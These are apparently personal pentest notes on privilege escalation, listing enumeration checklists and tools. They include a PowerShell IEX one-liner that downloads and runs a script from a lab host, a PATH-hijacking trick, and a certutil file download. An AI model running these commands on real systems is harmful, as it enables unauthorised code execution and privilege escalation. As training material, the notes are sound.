Just because you pop’ed a shell doenst mean its game over. Sometimes you find your self in a low privilage process and in order to compromise the host fully you would need to escalate your privileges
| Checklists |
|---|
| g0tmi1k Linux Privilege Escalation |
| hacktricks Linux Privilege Escalation |
| fuzzysecurity Windows Privilege Escalation |
| PowerSploit - PowerUp |
| PayloadAllTheThings |
| Scripts | |
|---|---|
| linPEAS | |
| winPEAS | |
| linenum | |
| MSF - local_exploit_suggester | |
| AonCyberLabs/Windows-Exploit-Suggester | |
| jondonas/linux-exploit-suggester-2 | |
| RastaMouse/Sherlock | powershell "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.24:8888/Sherlock.ps1');$a=find-allvulns;$a | where-object {$_.VulnStatus -notlike 'not *'}| ft Title,VulnStatus,MSBulletin,CVEID,Link -autosize" |
If something searches the Path for a a command and where able to replace the path we can trick the system to execute something else.
Whenever we use ls it will now actually run cat.
export PATH="/tmp/tmp:${PATH}"
cp /bin/cat /tmp/tmp/cat
mv /tmp/tmp/cat /tmp/tmp/ls
certutil.exe -urlcache -split -f "https://url/file" file